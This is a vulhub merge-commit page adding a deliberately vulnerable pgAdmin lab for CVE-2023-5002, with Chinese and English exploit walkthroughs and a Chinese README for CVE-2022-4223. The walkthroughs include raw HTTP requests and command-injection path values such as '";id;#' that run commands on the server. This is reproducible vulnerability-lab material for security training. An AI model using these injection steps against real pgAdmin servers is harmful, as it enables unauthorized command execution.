Merge pull request vulhub#512 from vulhub/pgadmin-cve-2023-5002

Added pgAdmin CVE-2023-5002 env
startsw1th · Apr 5, 2024 · 99ce311 · 99ce311
2 parents 0d09bb6 + 555a65f
commit 99ce311
Show file tree

Hide file tree

Showing 12 changed files with 314 additions and 0 deletions.
diff --git a/base/pgadmin/7.6/Dockerfile b/base/pgadmin/7.6/Dockerfile
@@ -0,0 +1,13 @@
+FROM python:3.10
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY requirements.txt /tmp/requirements.txt
+RUN set -ex \
+    && pip install -r /tmp/requirements.txt
+
+ENV PGADMIN_SETUP_EMAIL=vulhub@example.com PGADMIN_SETUP_PASSWORD=vulhub
+COPY config_local.py /usr/local/lib/python3.10/site-packages/pgadmin4/config_local.py
+
+WORKDIR /usr/local/lib/python3.10/site-packages/pgadmin4
+CMD [ "pgadmin4" ]
diff --git a/base/pgadmin/7.6/config_local.py b/base/pgadmin/7.6/config_local.py
@@ -0,0 +1,16 @@
+from config import *
+
+# Debug mode
+DEBUG = False
+
+# App mode
+SERVER_MODE = True
+
+# Enable the test module
+MODULE_BLACKLIST.remove('test')
+
+# Log
+CONSOLE_LOG_LEVEL = DEBUG
+FILE_LOG_LEVEL = DEBUG
+
+DEFAULT_SERVER = '0.0.0.0'
diff --git a/base/pgadmin/7.6/requirements.txt b/base/pgadmin/7.6/requirements.txt
@@ -0,0 +1,109 @@
+alembic==1.13.1
+Authlib==1.2.1
+azure-common==1.1.28
+azure-core==1.30.1
+azure-identity==1.13.0
+azure-mgmt-core==1.4.0
+azure-mgmt-rdbms==10.1.0
+azure-mgmt-resource==23.0.1
+azure-mgmt-subscription==3.1.1
+Babel==2.14.0
+bcrypt==4.0.1
+bidict==0.23.1
+blinker==1.7.0
+boto3==1.28.85
+botocore==1.31.85
+Brotli==1.1.0
+cachetools==5.3.3
+certifi==2024.2.2
+cffi==1.16.0
+charset-normalizer==3.3.2
+click==8.1.7
+cryptography==41.0.7
+dnspython==2.6.1
+email_validator==2.1.1
+eventlet==0.33.3
+Flask==2.2.5
+flask-babel==3.1.0
+Flask-Compress==1.14
+Flask-Gravatar==0.5.0
+Flask-Login==0.6.3
+Flask-Mail==0.9.1
+Flask-Migrate==4.0.7
+Flask-Paranoid==0.3.0
+Flask-Principal==0.4.0
+Flask-Security-Too==5.1.2
+Flask-SocketIO==5.3.6
+Flask-SQLAlchemy==3.0.5
+Flask-WTF==1.1.1
+google-api-core==2.18.0
+google-api-python-client==2.125.0
+google-auth==2.29.0
+google-auth-httplib2==0.2.0
+google-auth-oauthlib==1.0.0
+googleapis-common-protos==1.63.0
+greenlet==1.1.2
+h11==0.14.0
+httpagentparser==1.9.5
+httplib2==0.22.0
+idna==3.6
+importlib_metadata==7.1.0
+isodate==0.6.1
+itsdangerous==2.1.2
+jaraco.classes==3.4.0
+jeepney==0.8.0
+Jinja2==3.1.3
+jmespath==1.0.1
+keyring==23.13.1
+ldap3==2.9.1
+Mako==1.3.2
+MarkupSafe==2.1.5
+more-itertools==10.2.0
+msal==1.28.0
+msal-extensions==1.1.0
+msrest==0.7.1
+oauthlib==3.2.2
+packaging==24.0
+paramiko==3.4.0
+passlib==1.7.4
+pgadmin4==7.6
+Pillow==9.5.0
+portalocker==2.8.2
+proto-plus==1.23.0
+protobuf==4.25.3
+psutil==5.9.8
+psycopg==3.1.9
+psycopg-binary==3.1.9
+pyasn1==0.6.0
+pyasn1_modules==0.4.0
+pycparser==2.22
+PyJWT==2.8.0
+PyNaCl==1.5.0
+pyotp==2.9.0
+pyparsing==3.1.2
+pypng==0.20220715.0
+python-dateutil==2.9.0.post0
+python-engineio==4.9.0
+python-socketio==5.11.2
+pytz==2023.4
+qrcode==7.4.2
+requests==2.31.0
+requests-oauthlib==2.0.0
+rsa==4.9
+s3transfer==0.7.0
+SecretStorage==3.3.3
+simple-websocket==1.0.0
+six==1.16.0
+speaklater3==1.4
+SQLAlchemy==2.0.29
+sqlparse==0.4.4
+sshtunnel==0.4.0
+typing_extensions==4.10.0
+ua-parser==0.18.0
+uritemplate==4.1.1
+urllib3==1.26.18
+user-agents==2.2.0
+Werkzeug==2.2.3
+wsproto==1.2.0
+WTForms==3.0.1
+zipp==3.18.1
diff --git a/pgadmin/CVE-2022-4223/README.md b/pgadmin/CVE-2022-4223/README.md
@@ -8,6 +8,7 @@ The pgAdmin server includes an HTTP API that is intended to be used to validate
 
 References:
 
+- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
 - <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
 - <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
 

diff --git a/pgadmin/CVE-2022-4223/README.zh-cn.md b/pgadmin/CVE-2022-4223/README.zh-cn.md
@@ -0,0 +1,63 @@
+# pgAdmin <= 6.16 无授权远程命令执行漏洞（CVE-2022-4223）
+
+pgAdmin是一个著名的PostgreSQL数据库管理平台。
+
+pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件，比如pg_dump和pg_restore。但在其6.16版本及以前，对于用户传入的路径没有做合适的验证，导致未授权的用户可以在目标服务器上执行任意命令。
+
+参考链接：
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
+- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
+- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
+
+## 漏洞环境
+
+执行如下命令启动一个pgAdmin 6.16服务器：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
+
+## 漏洞复现
+
+在复现漏洞前，需要发送如下数据包获取CSRF token：
+
+```
+GET /login HTTP/1.1
+Host: your-ip:5050
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+
+```
+
+在返回包中拿到一个新的session id和csrf token：
+
+![](1.png)
+
+然后，将获取到的session id和csrf token填写进下面的数据包并发送：
+
+```
+POST /misc/validate_binary_path HTTP/1.1
+Host: your-ip:5050
+Content-Length: 27
+X-pgA-CSRFToken: [csrf-token]
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Cookie: pga4_session=[session-id]
+Connection: close
+
+{"utility_path":"a\";id;#"}
+```
+
+可见，`id`命令已经被成功执行：
+
+![](2.png)
diff --git a/pgadmin/CVE-2023-5002/1.png b/pgadmin/CVE-2023-5002/1.png
diff --git a/pgadmin/CVE-2023-5002/2.png b/pgadmin/CVE-2023-5002/2.png
diff --git a/pgadmin/CVE-2023-5002/3.png b/pgadmin/CVE-2023-5002/3.png
diff --git a/pgadmin/CVE-2023-5002/4.png b/pgadmin/CVE-2023-5002/4.png
diff --git a/pgadmin/CVE-2023-5002/README.md b/pgadmin/CVE-2023-5002/README.md
@@ -0,0 +1,55 @@
+# pgAdmin <= 7.6 Authenticated Remote Command Execution (CVE-2023-5002)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+pgAdmin is a popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
+
+A flaw was found in pgAdmin. This issue occurs when the pgAdmin server HTTP API validates the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. Versions of pgAdmin prior to 7.7 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.
+
+References:
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/35f05e49b3632a0a674b9b36535a7fe2d93dd0c2>
+- <https://github.com/advisories/GHSA-ghp8-52vx-77j4>
+
+## Vulnerable Environment
+
+Execute following command to start a pgAdmin 7.6 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:5050` to see the default login page of pgAdmin.
+
+### Something we should know before exploiting the issue
+
+CVE-2023-5002 is a pathes bypass for previous issue [CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223). There are 2 updates from official patches:
+
+- Added `@login_required` to `validate_binary_path` function, not allowed unauthenticated user to access this API
+- Added `os.path.exists()` to check if the user provided parameter is a valid path
+
+Unfortunately, we can only bypass the second patch, so the CVE-2023-5002 is a authenticated vulerability.
+
+## Exploit
+
+Login the pgAdmin by username `vulhub@example.com` and password `vulhub`.
+
+Select "Tools -> Storage Manager" to open the filemanager dialog:
+
+![](1.png)
+
+Create a new folder which name is a crafted payload `";id;#`:
+
+![](2.png)
+
+Full path of this folder is `/var/lib/pgadmin/storage/vulhub_example.com/";id;#`, we will use this path to complete the exploitation.
+
+Go to "File -> Preferences" to open the setting dialog, open the "Paths -> Binary paths" panel.
+
+Fill the `/var/lib/pgadmin/storage/vulhub_example.com/";id;#` into any field of "PostgreSQL Binary Path" then click validate:
+
+![](3.png)
+
+As you can see, the `id` command is executed successful:
+
+![](4.png)
diff --git a/pgadmin/CVE-2023-5002/README.zh-cn.md b/pgadmin/CVE-2023-5002/README.zh-cn.md
@@ -0,0 +1,51 @@
+# pgAdmin <= 7.6 后台远程命令执行漏洞（CVE-2023-5002）
+
+pgAdmin是一个著名的PostgreSQL数据库管理平台。
+
+pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件，比如pg_dump和pg_restore。在[CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223)中，这个API可被用于执行任意命令，官方对此进行了修复，但在7.6版本及以前修复并不完全，导致后台用户仍然可以执行任意命令。
+
+参考链接：
+
+- <https://github.com/pgadmin-org/pgadmin4/commit/35f05e49b3632a0a674b9b36535a7fe2d93dd0c2>
+- <https://github.com/advisories/GHSA-ghp8-52vx-77j4>
+
+## 漏洞环境
+
+执行如下命令启动一个pgAdmin 7.6服务器：
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
+
+### 一些值得注意的事情
+
+CVE-2023-5002是一个针对[CVE-2022-4223](https://github.com/vulhub/vulhub/tree/master/pgadmin/CVE-2022-4223)漏洞的补丁绕过漏洞。官方发布了下面两个修复补丁修复漏洞：
+
+- 给`validate_binary_path`函数增加`@login_required`装饰器，限制未授权的用户访问相关接口
+- 使用`os.path.exists()`检查用户传入的路径是否有效
+
+不幸地是，只有第二个修复补丁可以被绕过，所以该漏洞仅是一个后台命令执行漏洞。
+
+## 漏洞复现
+
+使用帐号`vulhub@example.com`和密码`vulhub`登录pgAdmin。
+
+热爱后选择“Tools -> Storage Manager”打开文件管理器：
+
+![](1.png)
+
+创建一个新的目录，名字是我们的Payload `";id;#`：
+
+![](2.png)
+
+这个目录的完整路径是`/var/lib/pgadmin/storage/vulhub_example.com/";id;#`，我们后续就需要使用这个路径来利用漏洞。
+
+选择“File -> Preferences”打开设置页面，并来到“Paths -> Binary paths”面板。在任意一个“PostgreSQL Binary Path”文本框中填入`/var/lib/pgadmin/storage/vulhub_example.com/";id;#`，并点击右侧的“验证”按钮：
+
+![](3.png)
+
+可见，`id`命令被成功执行：
+
+![](4.png)
diff --git a/pgadmin/CVE-2023-5002/docker-compose.yml b/pgadmin/CVE-2023-5002/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/pgadmin:7.6
+   ports:
+    - "5050:5050"